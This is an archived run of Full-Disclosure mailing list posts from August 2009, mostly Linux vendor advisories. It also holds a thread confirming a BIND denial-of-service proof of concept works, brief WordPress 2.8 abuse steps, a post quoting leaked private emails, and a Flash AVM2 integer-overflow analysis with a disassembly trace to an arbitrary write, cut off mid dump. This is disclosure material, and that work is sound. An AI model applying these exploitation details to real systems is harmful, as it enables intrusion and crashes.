From security at mandriva.com Sat Aug 1 02:52:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Sat, 01 Aug 2009 03:52:01 +0200 Subject: [Full-disclosure] [ MDVSA-2009:186 ] firebird Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:186 http://www.mandriva.com/security/ _______________________________________________________________________ Package : firebird Date : August 1, 2009 Affected: Enterprise Server 5.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in firebird: src/remote/server.cpp in fbserver.exe in Firebird SQL 1.5 before 1.5.6, 2.0 before 2.0.6, 2.1 before 2.1.3, and 2.5 before 2.5 Beta 2 allows remote attackers to cause a denial of service (daemon crash) via a malformed op_connect_request message that triggers an infinite loop or NULL pointer dereference (CVE-2009-2620). This update provides fixes for this vulnerability. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2620 _______________________________________________________________________ Updated Packages: Mandriva Enterprise Server 5: b079d70502103f4908203dea59a91248 mes5/i586/firebird-2.1.1.17910.0-2.1mdvmes5.i586.rpm ec752766878bd7e4b00e33d51e667e8b mes5/i586/firebird-classic-2.1.1.17910.0-2.1mdvmes5.i586.rpm e3b66b0a4161966cec7e9b24b8aa71bb mes5/i586/firebird-devel-2.1.1.17910.0-2.1mdvmes5.i586.rpm dc22e94ff304efea6ff1941cff52f31e mes5/i586/firebird-server-classic-2.1.1.17910.0-2.1mdvmes5.i586.rpm 427c8189fad6327c322bfc3e48345808 mes5/i586/firebird-server-common-2.1.1.17910.0-2.1mdvmes5.i586.rpm 14e3ecc7d5ea4eed3476ba554f3e6444 mes5/i586/firebird-server-superserver-2.1.1.17910.0-2.1mdvmes5.i586.rpm dea6942157b08a1e5622a537c8c4cdaf mes5/i586/firebird-superserver-2.1.1.17910.0-2.1mdvmes5.i586.rpm 367cc534375eb76cf14b511601bc87a0 mes5/i586/firebird-utils-classic-2.1.1.17910.0-2.1mdvmes5.i586.rpm 25cc78376c46c09194a2e647dd175f36 mes5/i586/firebird-utils-superserver-2.1.1.17910.0-2.1mdvmes5.i586.rpm b10012928ebbc975e9fb6f826b30a81b mes5/i586/libfbclient2-2.1.1.17910.0-2.1mdvmes5.i586.rpm 54cfde7d5a3e499f89b91af2a7bc27c4 mes5/i586/libfbembed2-2.1.1.17910.0-2.1mdvmes5.i586.rpm 161b06e3394d92eff141b27b45c85b8d mes5/SRPMS/firebird-2.1.1.17910.0-2.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 981b197469655dd55fefb186c67232bd mes5/x86_64/firebird-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm 0a72253abf14a7a0018a3cf1f776405f mes5/x86_64/firebird-classic-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm 264264449a6c14d3f0b7a1cfdbf8d8c6 mes5/x86_64/firebird-devel-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm 574d22f9bfc94aad63eaca320b650876 mes5/x86_64/firebird-server-classic-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm 44252f31dc26efdf162c918d915eedee mes5/x86_64/firebird-server-common-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm 60690ee7be6be22f47b5d2c319050274 mes5/x86_64/firebird-server-superserver-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm bf89b7fe53efcafd66e280e635cb8dfc mes5/x86_64/firebird-superserver-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm 302ec83d076fa64501602bc81d85f312 mes5/x86_64/firebird-utils-classic-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm 05f57e87ea5b7491596f8a2e7526498f mes5/x86_64/firebird-utils-superserver-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm e9c33348f8006660c2f9f78f62bc3dc3 mes5/x86_64/lib64fbclient2-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm 76c2a132634890c698f62e6702357bb8 mes5/x86_64/lib64fbembed2-2.1.1.17910.0-2.1mdvmes5.x86_64.rpm 161b06e3394d92eff141b27b45c85b8d mes5/SRPMS/firebird-2.1.1.17910.0-2.1mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKc3gxmqjQ0CJFipgRAoS8AJ9TZtgfIlInvJJBQVbin6XM+pLatgCg8cMM U8SzJUOPGh6ZfwMQygdqJyo= =4pTv -----END PGP SIGNATURE----- From security at mandriva.com Sat Aug 1 03:40:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Sat, 01 Aug 2009 04:40:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:187 ] nagios Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:187 http://www.mandriva.com/security/ _______________________________________________________________________ Package : nagios Date : August 1, 2009 Affected: Corporate 4.0, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in nagios: statuswml.cgi in Nagios before 3.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) ping or (2) Traceroute parameters (CVE-2009-2288). This update provides nagios 3.1.2, which is not vulnerable to this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2288 _______________________________________________________________________ Updated Packages: Corporate 4.0: 7472e8523c46ca410cefd9409a179268 corporate/4.0/i586/nagios-3.1.2-0.1.20060mlcs4.i586.rpm 89a90ebea94c9b6be5b96b29b057e941 corporate/4.0/i586/nagios-devel-3.1.2-0.1.20060mlcs4.i586.rpm ed9c5a112b2da874d94d77d9e487295f corporate/4.0/i586/nagios-theme-default-3.1.2-0.1.20060mlcs4.i586.rpm 1b5be207136af2bea3c57a6cae095d1f corporate/4.0/i586/nagios-www-3.1.2-0.1.20060mlcs4.i586.rpm 8727421dc7496303fbd8f61d2ad9ad7b corporate/4.0/SRPMS/nagios-3.1.2-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 0327db2ac9b511fa72c4a4ac7349ee0a corporate/4.0/x86_64/nagios-3.1.2-0.1.20060mlcs4.x86_64.rpm 7a36ca1cb34667d84d78f9b0b48f2976 corporate/4.0/x86_64/nagios-devel-3.1.2-0.1.20060mlcs4.x86_64.rpm a81e17fc9f68d97674c252f0266d6502 corporate/4.0/x86_64/nagios-theme-default-3.1.2-0.1.20060mlcs4.x86_64.rpm 6b4da1474cc9b4931fa8dcbe7f9b75ef corporate/4.0/x86_64/nagios-www-3.1.2-0.1.20060mlcs4.x86_64.rpm 8727421dc7496303fbd8f61d2ad9ad7b corporate/4.0/SRPMS/nagios-3.1.2-0.1.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 248bc01aab687002a8358916e7b3fc82 mes5/i586/nagios-3.1.2-0.2mdvmes5.i586.rpm 44aeb0da66acda1d01549f56a190800f mes5/i586/nagios-devel-3.1.2-0.2mdvmes5.i586.rpm 305cefdd9a47d7ce8ab6a4fd388f02d6 mes5/i586/nagios-theme-default-3.1.2-0.2mdvmes5.i586.rpm 3333d2362e45a46a0eccbeed8719435e mes5/i586/nagios-www-3.1.2-0.2mdvmes5.i586.rpm e66cb2c237aed7e1e96251054a191413 mes5/SRPMS/nagios-3.1.2-0.2mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 6c37a65ce53a4795fe78747d2aa3b25c mes5/x86_64/nagios-3.1.2-0.2mdvmes5.x86_64.rpm b58de355fcb5f7fac50dc251c3ebbd54 mes5/x86_64/nagios-devel-3.1.2-0.2mdvmes5.x86_64.rpm 5dd3dca4fbb5530382d8b3aeb4fcf5b0 mes5/x86_64/nagios-theme-default-3.1.2-0.2mdvmes5.x86_64.rpm 3a216297c88bbf869440b3594ec27027 mes5/x86_64/nagios-www-3.1.2-0.2mdvmes5.x86_64.rpm e66cb2c237aed7e1e96251054a191413 mes5/SRPMS/nagios-3.1.2-0.2mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKc4A/mqjQ0CJFipgRAoifAJ9WmG+u08se/DyR2TjZ2GX+nRpyLgCgkiKo DqUpIY99w28fMGbbq0S+quY= =0LGX -----END PGP SIGNATURE----- From security at mandriva.com Sat Aug 1 04:21:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Sat, 01 Aug 2009 05:21:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:188 ] php4-eaccelerator Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:188 http://www.mandriva.com/security/ _______________________________________________________________________ Package : php4-eaccelerator Date : August 1, 2009 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in php4-eaccelerator: encoder.php in eAccelerator allows remote attackers to execute arbitrary code by copying a local executable file to a location under the web root via the -o option, and then making a direct request to this file, related to upload of image files (CVE-2009-2353). Additionally to adressing the security issue this update also provides php4-eaccelerator 0.9.5. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2353 _______________________________________________________________________ Updated Packages: Corporate 4.0: 316f952f5c20ac686b85b90663e0fa77 corporate/4.0/i586/php4-eaccelerator-0.9.5-1.1.20060mlcs4.i586.rpm a5a1897fc80cefe48bb007a79faee847 corporate/4.0/i586/php4-eaccelerator-admin-0.9.5-1.1.20060mlcs4.i586.rpm ed1eda86b967cb3ee8d7f6792833aa4d corporate/4.0/i586/php4-eaccelerator-eloader-0.9.5-1.1.20060mlcs4.i586.rpm 600f50f507a5027362791c7e5920a163 corporate/4.0/SRPMS/php4-eaccelerator-0.9.5-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: e9e3ee27351d4a545e3d37272ef89d8f corporate/4.0/x86_64/php4-eaccelerator-0.9.5-1.1.20060mlcs4.x86_64.rpm d999744cdb5f8325a59a84dd3c478397 corporate/4.0/x86_64/php4-eaccelerator-admin-0.9.5-1.1.20060mlcs4.x86_64.rpm 0f4a2d49182485b26370593bc2bd1dab corporate/4.0/x86_64/php4-eaccelerator-eloader-0.9.5-1.1.20060mlcs4.x86_64.rpm 600f50f507a5027362791c7e5920a163 corporate/4.0/SRPMS/php4-eaccelerator-0.9.5-1.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKc4ovmqjQ0CJFipgRAtxWAJ9wvmBP3NFxBZcdLBZwjImePm87XgCgyAVV YP8t9vYXxJ2dtPhPilQC3eQ= =W9Py -----END PGP SIGNATURE----- From keytoaster at gentoo.org Sat Aug 1 13:37:00 2009 From: keytoaster at gentoo.org (Tobias Heinlein) Date: Sat, 01 Aug 2009 14:37:00 +0200 Subject: [Full-disclosure] [ GLSA 200908-01 ] OpenSC: Multiple vulnerabilities Message-ID: <4A7436EC.1050907@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenSC: Multiple vulnerabilities Date: August 01, 2009 Bugs: #260514, #269920 ID: 200908-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in OpenSC. Background ========== OpenSC provides a set of libraries and utilities to access smart cards. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/opensc < 0.11.8 >= 0.11.8 Description =========== Multiple vulnerabilities were found in OpenSC: * b.badrignans discovered that OpenSC incorrectly initialises private data objects (CVE-2009-0368). * Miquel Comas Marti discovered that src/tools/pkcs11-tool.c in pkcs11-tool in OpenSC 0.11.7, when used with unspecified third-party PKCS#11 modules, generates RSA keys with incorrect public exponents (CVE-2009-1603). Impact ====== The first vulnerabilty allows physically proximate attackers to bypass intended PIN requirements and read private data objects. The second vulnerability allows attackers to read the cleartext form of messages that were intended to be encrypted. NOTE: Smart cards which were initialised using an affected version of OpenSC need to be modified or re-initialised. See the vendor's advisory for details. Workaround ========== There is no known workaround at this time. Resolution ========== All OpenSC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/opensc-0.11.8" References ========== [ 1 ] CVE-2009-0368 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0368 [ 2 ] CVE-2009-1603 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1603 [ 3 ] OpenSC Security Advisory http://www.opensc-project.org/pipermail/opensc-announce/2009-February/000023.html Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090801/8dcc699d/attachment.bin From yersinia.spiros at gmail.com Sat Aug 1 14:25:46 2009 From: yersinia.spiros at gmail.com (yersinia) Date: Sat, 1 Aug 2009 15:25:46 +0200 Subject: [Full-disclosure] THISISNOTMYEXPLOIT In-Reply-To: <72f8221d0907310858k7b3fa498s7a494adf5d35820f@mail.gmail.com> References: <72f8221d0907300344m4564bb61tddbc80c817dc2c50@mail.gmail.com> <72f8221d0907300424v4037fbefl84af3adca3d246c7@mail.gmail.com> <72f8221d0907310858k7b3fa498s7a494adf5d35820f@mail.gmail.com> Message-ID: On Fri, Jul 31, 2009 at 5:58 PM, Kingcope wrote: > Hello people, > Yes there is a warning when the PoC is compiled. But I guess that is > not a big issue. No, problem. It is only necessary to include stdlib.h because malloc is implicitily defined (gcc complaint). Anyway, your POC work as aspected. Thanks. In this days it is difficult to see a true exploit in a mailing list. The fact that bug was discovered from someone else is not important : you have rewritten in another language, so it is only your work. Regards > So about what PoC am I talking about? > It seems that the moderator of bugtraq keeps blocking me because of fancy > headlines maybe. The moderator of bugtraq blocked the actual exploit but let > the following messages slip through. The PoC is on milw0rm.com and > full disclosure. > Thanks for clarifying the issue with the zones, I really have not a > 100% understanding > of the DNS protocol therefore I took a guess on my named.conf file and put the > address into the PoC. > > Thanks for your time, > > Kingcope > > > 2009/7/31 yersinia : >> Repost for mailing problem. >> On Fri, Jul 31, 2009 at 12:14 AM, yersinia wrote: >>> >>> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope wrote: >>>> >>>> Hello again, >>>> the default setting of 127.in-addr.arpa is a bit weird >>>> >>>> try >>>> ./bind localhost >>> >>> Never mind. I have only a warning from gcc because it was necessary to include stdlib.h for malloc. >>> >>> But, the important thing is that it works as aspected. >>> >>> Regards >>>> >>>> lewls >>>> >>>> XD >>>> >>>> kcope >>>> >>>> 2009/7/30 Kingcope : >>>> > I own nothing. >>>> > >>>> > Cheers, >>>> > >>>> > kcope >>>> > >> >>>> >>>> _______________________________________________ >>>> Full-Disclosure - We believe in it. >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> > From security at mandriva.com Sat Aug 1 15:29:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Sat, 01 Aug 2009 16:29:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:189 ] apache-mod_auth_mysql Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:189 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apache-mod_auth_mysql Date : August 1, 2009 Affected: 2008.1, 2009.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in mod_auth_mysql: SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x allows remote attackers to execute arbitrary SQL commands via multibyte character encodings for unspecified input (CVE-2008-2384). This update provides fixes for this vulnerability. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2384 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 8fad04a01d1c8f81341281d22cb15631 2008.1/i586/apache-mod_auth_mysql-3.0.0-15.1mdv2008.1.i586.rpm c593e9a6de76eb26171d0a1a761be234 2008.1/SRPMS/apache-mod_auth_mysql-3.0.0-15.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: e0ef6a82166a4c51c73df1a123cadc55 2008.1/x86_64/apache-mod_auth_mysql-3.0.0-15.1mdv2008.1.x86_64.rpm c593e9a6de76eb26171d0a1a761be234 2008.1/SRPMS/apache-mod_auth_mysql-3.0.0-15.1mdv2008.1.src.rpm Mandriva Linux 2009.0: 2449a104b728fa046695fc275f8e12a6 2009.0/i586/apache-mod_auth_mysql-3.0.0-17.1mdv2009.0.i586.rpm 5e32f9eceb68760512a08343b680d87f 2009.0/SRPMS/apache-mod_auth_mysql-3.0.0-17.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 3095cb9c81915e594ec4109ca79cc6b7 2009.0/x86_64/apache-mod_auth_mysql-3.0.0-17.1mdv2009.0.x86_64.rpm 5e32f9eceb68760512a08343b680d87f 2009.0/SRPMS/apache-mod_auth_mysql-3.0.0-17.1mdv2009.0.src.rpm Corporate 4.0: 0a81210d2ed08e9687635f38f23b67f3 corporate/4.0/i586/apache-mod_auth_mysql-3.0.0-5.1.20060mlcs4.i586.rpm 65550cc56b4e9f808119c0de2ebaec47 corporate/4.0/SRPMS/apache-mod_auth_mysql-3.0.0-5.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 86e8313568d27765f1968f5e29cff658 corporate/4.0/x86_64/apache-mod_auth_mysql-3.0.0-5.1.20060mlcs4.x86_64.rpm 65550cc56b4e9f808119c0de2ebaec47 corporate/4.0/SRPMS/apache-mod_auth_mysql-3.0.0-5.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKdCP+mqjQ0CJFipgRAnxgAJ9ueZG+34d1Y5xvFlIKCP7p0iUcvwCeLTZD cTTrc8rIvrHIitt31bamsew= =WFw2 -----END PGP SIGNATURE----- From a3li at gentoo.org Sat Aug 1 21:04:23 2009 From: a3li at gentoo.org (Alex Legler) Date: Sat, 1 Aug 2009 22:04:23 +0200 Subject: [Full-disclosure] [ GLSA 200908-02 ] BIND: Denial of Service Message-ID: <20090801220423.38f0a595@neon> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200908-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: BIND: Denial of Service Date: August 01, 2009 Bugs: #279508 ID: 200908-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Dynamic Update packets can cause a Denial of Service in the BIND daemon. Background ========== ISC BIND is the Internet Systems Consortium implementation of the Domain Name System (DNS) protocol. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-dns/bind < 9.4.3_p3 >= 9.4.3_p3 Description =========== Matthias Urlichs reported that the dns_db_findrdataset() function fails when the prerequisite section of the dynamic update message contains a record of type "ANY" and where at least one RRset for this FQDN exists on the server. Impact ====== A remote unauthenticated attacker could send a specially crafted dynamic update message to the BIND daemon (named), leading to a Denial of Service (daemon crash). This vulnerability affects all primary (master) servers -- it is not limited to those that are configured to allow dynamic updates. Workaround ========== Configure a firewall that performs Deep Packet Inspection to prevent nsupdate messages from reaching named. Alternatively, expose only secondary (slave) servers to untrusted networks. Resolution ========== All BIND users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-dns/bind-9.4.3_p3" References ========== [ 1 ] CVE-2009-0696 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0696 [ 2 ] ISC advisory https://www.isc.org/node/474 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200908-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090801/d8d87f5b/attachment.bin From omglol at hushmail.me Sat Aug 1 21:16:27 2009 From: omglol at hushmail.me (omglol at hushmail.me) Date: Sat, 01 Aug 2009 22:16:27 +0200 Subject: [Full-disclosure] Dumbest bug of this month - Wordpress 2.8 Message-ID: <20090801201628.07F2FB804E@smtp.hushmail.com> 1. Visit .com and register as a subscriber 2. Visit wp-admin//options-writing.php and post gay p0rn using the noted e-mail address. / Search for interesting unprotected Plugin pages to gain shell greetings to ZFO and have fun at defcon (bug was leaked to wp-security team so .. be quick :D ) From sekuritymatter at gmail.com Sun Aug 2 00:03:18 2009 From: sekuritymatter at gmail.com (Ew0k) Date: Sun, 02 Aug 2009 00:03:18 +0100 Subject: [Full-disclosure] Just Asking Message-ID: <4A74C9B6.40309@gmail.com> A friend of mine observed something that I believe should be put on the table. While reading the e-mails sent back and forth by Dan Kaminsky, illegally published on zf05 one of the e-mails caught his eye: """ Dan, This is another of our clients and you do not have the permission of the client to perform this kind of scanning. You have triggered over 22,000 events for us in this range alone as well as caused a few other minor aggravations. While you may believe you are a researcher and doing good, performing your unauthorized testing on live production platforms is a reportable offense. I am going to kindly suggest you seek permission from various targets before you continue your "research". Please note I am under contractual obligations to report your activities, we have recorded your "scans" on over 26 devices globally and none of our clients have given you permission to perform these "tests" """ Now, according to this e-mail should Dan's CISSP certification be revised? -- Ew0k - Anxiety generates errors, and errors create oportunities... http://sekuritymatters.wordpress.com From roeehay at gmail.com Sun Aug 2 02:59:45 2009 From: roeehay at gmail.com (Roee Hay) Date: Sun, 2 Aug 2009 04:59:45 +0300 Subject: [Full-disclosure] Advisory: Adobe Flash Player and AIR AVM2 intf_count Integer Overflow Remote Code Execution (CVE-2009-1869) Message-ID: <32cf00140908011859u1134ecep65a18fd470f3e3a@mail.gmail.com> Background ========== ActionScript code is compiled into ActionScript Byte Code segments, loaded by AVM2 (ActionScript Virtual Machine 2). These segments are described by the abcFile structure: abcFile { u16 minor_version u16 major_version cpool_info constant_pool u30 method_count method_info method[method_count] u30 metadata_count metadata_info metadata[metadata_count] u30 class_count instance_info instance[class_count] class_info class[class_count] u30 script_count script_info script[script_count] u30 method_body_count method_body_info method_body[method_body_count] } The value of class_count element is the number of entries in the instance and class arrays. Each instance entry is a variable length instance_info structure which specifies the characteristics of object instances created by a particular class: instance_info { u30 name u30 super_name u8 flags u30 protectedNs u30 intrf_count u30 interface[intrf_count] u30 iinit u30 trait_count traits_info trait[trait_count] } The value of the intrf_count field is the number of entries in the interface array. The interface array contains indices into the multiname array of the constant pool; the referenced names specify the interfaces implemented by this class. Vulnerability ============= An integer overflow exists in the AVM2 abcFile parser code which handles the intrf_count value of the instance_info structure. When intrf_count is larger than 0x10000000, it is nullified due to an integer overflow. This results in an out of bounds pointer dereference. The out of bounds object contains arbitrary values (in the context of the code which handles the interfaces count element) which are manipulated in a way so that an arbitrary memory overwrite with an attacker supplied destination and value is possible. The following is a detailed run trace which explains the vulnerability. Irrelevant instructions are omitted. Flash10b.ocx is assumed to be loaded at VA 10000000h. let be 0x10000000 .text:10206B03 mov edi, [esp+50h+var_2C] ; EDI==0x10000000 .text:10206B14 lea edx, [edi+edi] ; EDX==0x20000000, may not overflow (verified elsewhere) .text:10206B1B call sub_101EAC30 .text:101EAC45 call sub_101EAB90 .text:101EAB98 call sub_101D1FF0 ; this method calculates the nearest power of 2 for (i.e: stays 0x20000000) .text:101EABA0 add eax, eax ; doubles that value (i.e: EAX=0x40000000) .text:101EABCC lea ecx, ds:0[eax*4] ; multiplies it by 4 (i.e: ECX=0x00000000) =>OVERFLOW<= .text:101EABDA call sub_10224C62 .text:10224C62 jmp sub_10224363 .text:10224363 mov edx, [esp+arg_0] ; arg_0 is the overflown value (i.e: EDX=00000000) .text:10224367 lea eax, [edx+7] .text:10224376 and eax, 0FFFFFFF8h ; EAX=00000000 .text:1022437A mov esi, eax ; ESI=00000000 .text:102243A4 mov ecx, esi ; ECX=00000000 .text:102243A9 mov eax, [eax+ecx*4-4] ; the overflown value is used as an index into pointer table, starting at EAX. ; since we can cause ECX to become 0x0000000, we may select an out of bounds ; pointer (eax-4). Tests show that it always contains a valid pointer to some ; object, with arbitrary values. i.e: EAX=&OutOfBoundsObject .text:102243AD mov ecx, eax ; ECX=&OutOfBoundsObject .text:102243C8 call sub_10226D4D .text:10226D53 mov ebx, ecx ; EBX=&OutOfBoundsObject .text:10226D6C mov esi, [ebx+8] ; ESI=&ArbitraryObjectA (usually: 0x55555555) .text:10226D76 test byte ptr [esi+2Ah], 1 ; - must pass this in order to continue .text:10226D7A jz short loc_10226DA5 .text:10226D7C mov eax, [ebx+38h] ; EAX=&ArbitraryObjectB, (usually 0x55555557) .text:10226D7F cmp byte ptr [eax+33Ch], 0 ; - must pass this in order to continue .text:10226D86 mov ecx, ebx ; ECX=&OutOfBoundsObject .text:10226D88 jnz short loc_10226D9D .text:10226D8A push esi .text:10226D8B call sub_10226CAF .text:10226CB0 mov esi, [esp+4+arg_0] ; ESI=&ArbitraryObjectA, (usually 0x55555555) .text:10226CB5 push esi .text:10226CB6 mov edi, ecx ; EDI=&OutOfBoundsObject .text:10226CB8 call sub_102266CA .text:102266CA mov eax, [esp+arg_0] ; EAX=ESI=&ArbitraryObjectA (usually 0x55555555) .text:102266DB mov ecx, [eax+1Ch] ; ECX=arbitrary value - usually *(0x55555571) .text:102266CE mov edx, [eax+20h] ; EDX=arbitrary value - usually *(0x55555575) .text:102266DE mov [ecx+20h], edx; ; JACKPOT - a write of an arbitrary DWORD to an arbitrary VA The following is an illustration of the pointer table and the out of bounds pointer which may be dereferenced: addr val 0017487C 00E82000 <- EAX-4 (ECX=0) 00174880 001681C8 <- EAX (ECX=1) 00174884 00174AC8 00174888 00174BD0 0017488C 00174CD8 00174890 00174DE0 00174894 00174EE8 00174898 00174FF0 0017489C 001750F8 001748A0 00175200 001748A4 00175308 001748A8 00175410 001748AC 00175518 001748B0 00175620 001748B4 00175728 001748B8 00175830 001748BC 00175938 001748C0 00175A40 001748C4 00175B48 001748C8 00175C50 001748CC 00175D58 The following is a memory dump of the out of bounds object: 00E82000 44 51 55 55 55 45 55 75 55 55 55 55 55 55 55 55 00E82010 55 55 55 55 55 55 55 54 55 55 55 55 01 00 00 00 00E82020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00E82030 55 55 55 55 D5 55 55 55 57 55 55 55 55 55 55 55 00E82040 D5 5A 55 55 54 55 55 55 55 55 55 55 75 B5 